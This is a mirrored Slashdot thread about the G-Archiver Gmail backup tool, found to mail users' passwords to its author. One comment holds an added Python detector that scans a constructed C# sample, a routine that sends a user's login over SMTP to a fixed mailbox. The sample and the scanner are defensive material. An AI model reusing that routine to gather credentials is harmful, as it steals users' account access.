Slashdot Mirror


G-Archiver Harvesting Google Mail Passwords

Thwomp writes "It appears that a popular Gmail backup utility, G-Archiver, has been harvesting users' Gmail passwords. This was discovered when a developer named Dustin Brooks took a look at the code using a decompiler. He discovered a Gmail account name and password embedded in the source code. Brooks logged in and found over 1,700 emails all with user account information — with his own at the top. According to a story in Informationweek, he deleted the emails, changed the account password, and notified Google. The creator of G-Archiver has pulled the software, stating that it was debug code and was unintentionally left in the product."

21 of 462 comments

  1. This is why I backup my Gmail with G-Archiver by Anonymous Coward · · Score: 5, Funny

    Oh, wait...

    1. Re:This is why I backup my Gmail with G-Archiver by bberens · · Score: 5, Insightful

      Not really JUST as easily. You fully expect the G-Archiver to be transmitting encrypted (ssl) data to google. A few extra packets aren't going to raise any red flags.

      --
      Check out my lame java blog at www.javachopshop.com
    2. Re:This is why I backup my Gmail with G-Archiver by pipatron · · Score: 5, Insightful

      running a strong firewall

      Wouldn't help a bit; the good and the bad parts of the software used the same port to the same server in the same way.

      run a packet sniffer

      Wouldn't help a bit; the good and the bad parts of the software used the same SSL channel, you won't get into that with a normal sniffer.

      --
      c++; /* this makes c bigger but returns the old value */
    3. Re:This is why I backup my Gmail with G-Archiver by infonography · · Score: 5, Funny

      Well, he wrote it in .Net, isn't that enough evidence of malicious intent?

      --
      Sorry about the writing. Robot fingers, you know? Cliff Steele in DOOM PATROL #23
    4. Re:This is why I backup my Gmail with G-Archiver by TheoMurpse · · Score: 5, Insightful

      What I want to know is, if he used this for debugging purposes and left it in by accident, why didn't he ever see thousands of Gmail passwords showing up in his inbox and realize the problem?

    5. Re:This is why I backup my Gmail with G-Archiver by Rabbi+T.+White · · Score: 5, Insightful

      From looking at the pictures on the blog of the guy who discovered this, there were over 1000 unread emails - all the ones on the initial page of the inbox were usernames and passwords, quite clearly unread. If we're giving him the benefit of the doubt, it is likely that this was just a throw away account used for testing... or else he probably would've changed his own password, no?

      --
      Every cloud has a silver lining, but, then again, so does every cigarette packet.
  2. Debug, Sure by Archangel+Michael · · Score: 5, Insightful

    "The creator of G-Archiver has pulled the software, stating that it was debug code and was unintentionally left in the product."

    Right. And I have a bridge I'd like to sell you too.

    --
    Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
    1. Re:Debug, Sure by tristian_was_here · · Score: 5, Funny

      I did something similar. I once picked up the wrong keys, yet when I went to take them back to the person, I decided to let myself in and accidentally walked out with a new TV.

    2. Re:Debug, Sure by Anonymous Coward · · Score: 5, Funny

      Right. And I have a bridge I'd like to sell you too.

      Why do you feel the need to hurt the reputation and business of us legitimate bridge sellers?!?

  3. That doesn't make sense. by RandoX · · Score: 5, Insightful

    If you're debugging, you already have the account details. What possible reason could you have to email them to yourself?

  4. Hmmm by Anonymous Coward · · Score: 5, Funny

    he deleted the emails
    But did he make a backup first?
    1. Re:Hmmm by jeepee · · Score: 5, Insightful

      he deleted the emails
      But did he make a backup first?

      He tried but it caused an infinite loop.
  5. DMCA by yohaas · · Score: 5, Insightful

    If this was a big company, they would have denied it and gone after him under the DMCA. At least they admitted to something and pulled the product.

  6. Re:Even the courts aren't this daft by WPIDalamar · · Score: 5, Funny

    It only did send them to Gmail :)

  7. Never ascribe to malice by Pope · · Score: 5, Insightful

    what can be explained by incompetence?

    Although in this case, that's some serious incompetence going on!

    --
    It doesn't mean much now, it's built for the future.
  8. Just wondering... by Doodhwala · · Score: 5, Interesting
    So why did the binary program also have the password for the gmail account? One would assume that the email address would have been enough. After all, sending someone email doesn't require their password.
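    The summary above describes finding an account name and password embedded in decompiled code, and the comment just above asks why the binary carried the password at all. Submitting mail through an authenticated SMTP server such as smtp.gmail.com requires the sending account's own login, so a routine that mails captured credentials to its author has to carry that account's password as well as its address. As an added example, not code from G-Archiver or from anyone in this thread, here is a small Python scanner that walks decompiled C# text and flags the residue such a routine leaves behind: a string-literal SMTP host and a NetworkCredential built from two string literals. The sample it scans is constructed here; the class, method and account names in it are invented, and the assumption is only that a .NET decompiler renders these constructor calls in roughly this shape.

```python
"""Flag embedded mail credentials in decompiled C# (added example, constructed input)."""
import re
from dataclasses import dataclass

# Constructed stand-in for decompiler output. Class, method and account
# names are invented; "Hunter2!" is a placeholder, not a real password.
DECOMPILED_SAMPLE = '''
using System.Net;
using System.Net.Mail;

internal static class Reporter
{
    // Mails the user's own login to a fixed mailbox: the pattern to catch.
    internal static void Send(string user, string pass)
    {
        SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
        client.EnableSsl = true;
        client.Credentials = new NetworkCredential("example.dev@gmail.com", "Hunter2!");
        MailMessage msg = new MailMessage("example.dev@gmail.com", "example.dev@gmail.com");
        msg.Body = user + ":" + pass;
        client.Send(msg);
    }

    // Same API, but host and login come from configuration: not flagged.
    internal static void SendFromConfig(string body)
    {
        SmtpClient client = new SmtpClient(Config.Get("host"), 587);
        client.Credentials = new NetworkCredential(Config.Get("user"), Config.Get("pass"));
    }
}
'''

# One C# string literal, captured without its quotes (handles \" escapes).
STRING_LIT = r'"((?:[^"\\]|\\.)*)"'
# new NetworkCredential("user", "secret" ...) with both arguments as literals.
CRED_CTOR = re.compile(
    r'new\s+NetworkCredential\s*\(\s*' + STRING_LIT + r'\s*,\s*' + STRING_LIT + r'\s*[,)]')
# new SmtpClient("host" ...) with a literal host name.
SMTP_HOST = re.compile(r'new\s+SmtpClient\s*\(\s*' + STRING_LIT)


@dataclass(frozen=True)
class Finding:
    line: int
    kind: str
    detail: str


def scan(source: str) -> list:
    """Return one Finding per literal SMTP host or literal credential pair."""
    findings = []
    for lineno, text in enumerate(source.splitlines(), start=1):
        m = SMTP_HOST.search(text)
        if m:
            findings.append(Finding(lineno, "hardcoded_smtp_host", m.group(1)))
        m = CRED_CTOR.search(text)
        if m:
            user, secret = m.group(1), m.group(2)
            # Report the account and the secret's length, never the secret itself.
            findings.append(Finding(lineno, "hardcoded_credential",
                                    f"{user} / {'*' * len(secret)}"))
    return findings


def embeds_mail_account(source: str) -> bool:
    """True when the code both names a mail server and carries a literal login for it."""
    kinds = {f.kind for f in scan(source)}
    return {"hardcoded_smtp_host", "hardcoded_credential"} <= kinds


if __name__ == "__main__":
    for f in scan(DECOMPILED_SAMPLE):
        print(f"line {f.line}: {f.kind}: {f.detail}")
    print("embedded mail account:", embeds_mail_account(DECOMPILED_SAMPLE))
```

Run against real decompiler output the two regexes are a starting point, not a complete rule set: credentials assembled from concatenated fragments or base64 strings slip past a literal-only match, so a reviewer still reads the mail-sending path by hand once a hardcoded host is found.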

  9. Re:Even the courts aren't this daft by Zordak · · Score: 5, Funny

    This guy deserves to be prosecuted under anti-hacking statutes.
    Exactly. I mean, he was using a debugger! Doesn't he know that violates the DMCA? No doubt he'll be hearing from the G-Archiver lawyers AND the DoJ soon. It's time to show this clown that, in America, we don't put up with these kinds of shenanigans. And somebody call the copyright lobby. This is exactly the story they've been looking for to justify increasing the penalties for violating copyright to capital punishment.

    --
    Today's Sesame Street was brought to you by the number e.
  10. Re:Nice move, but illegal? by San-LC · · Score: 5, Insightful

    Possibly by some ridiculous interpretation of the law, Mr. Brooks was "hacking." However, he purchased the rights to use G-Archiver, and he did not recompile the program in a different way and label it his own. He used information that the program (to which he has the rights to use, unless otherwise stated in some bullsheet EULA) used, found out that this program acted like a Trojan virus and submitted private information to an individual's e-mail account, and subsequently removed his information and disallowed any new information to be read.

    Granted, he probably shouldn't have deleted everything and changed the password (morally: yes, legally: no), so it's likely he may face charges because of this. That's our legal system, folks.

  11. Re:A-ha! by Roofus · · Score: 5, Funny

    Yeah, I was logged into your account and noticed that too....very strange!

  12. Doesn't look malicious to me by Pogie · · Score: 5, Insightful

    Maybe I'm getting old, but this seems like a pretty clear case of "oh crap, I'm an idiot", rather than "mwuahahah, my plan for global domination proceeds apace!". According to the posting on codinghorror, the guy who found the issue (Dustin Brooks) found that the creator, John Terry, of the G-Archiver software had left his own email information in the code. Yes, the G-archiver forwarded a record of the account information of everyone who used the app to that mailbox, but if you look at the screenshot, none of those emails has been flagged as read by gmail (but maybe that's an artifact of a POP connection?).

    Either way, this just smacks to me of a novice developer doing something incredibly dumb, rather than incredibly malicious. If he actually wanted to just collect other people's account information, why leave his own in the source code? He could have just as easily forwarded the information to an anonymized email account, or simply an account for which the login information was not present in source.

    Just my opinion, I reserve the right to be wrong.
  13. Wha?!? by an.echte.trilingue · · Score: 5, Informative

    Rather, you're much better off running a strong firewall that's not the same piece of software or hardware at the boundary of your network which will pick up on nasty things
    I am quite interested in learning what kind of hard firewall you have that is capable of distinguishing between a packet sent over port 80 originating in, say, Internet Explorer and any other piece of software. I am also interested in knowing what software firewall you have that can block applications from rewriting its rules to allow themselves access.

    It's only 'easy' if your time has no value and you're competent to examine the source, which I would say the vast majority if not 99.9999% of people aren't...you can run a packet sniffer and keep an eye on what the software is sending across the network
    Um, IMHO, checking the source is way faster and takes way less skill than this easily subverted clusterf*ck that you are proposing. Besides, the very thing that makes a hardware firewall useless for cases like this also makes this approach unreliable.

    which I would say the vast majority if not 99.9999% of people aren't.
    While we are in the realm of imaginary statistics, I would say that about 100 times as many people are competent to examine the source of a program than to decompile a program and read the resulting nasty, uncommented, tangled pile of commands that results from that. That makes it about 100 times as likely that somebody will find a back door like this in OSS code, doesn't it?

    Oh, by the way, you realize that lots of people are paid to audit OSS code before they deploy it in their company, right? The ability to do this is actually a selling point for a lot of companies.

    (and unless the software has got a built-in ansible, that should be good enough for almost all applications.)
    What are you talking about?
    --
    weirdest thing I ever saw: scientology advertising on slashdot.